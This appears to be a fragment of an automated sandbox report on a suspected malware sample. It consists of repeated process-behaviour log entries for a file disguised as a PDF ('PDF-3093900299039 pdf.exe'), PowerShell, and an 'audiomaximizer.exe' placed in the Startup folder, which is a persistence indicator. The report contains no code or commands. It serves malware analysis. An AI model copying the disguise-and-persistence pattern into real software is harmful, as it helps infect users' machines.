Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
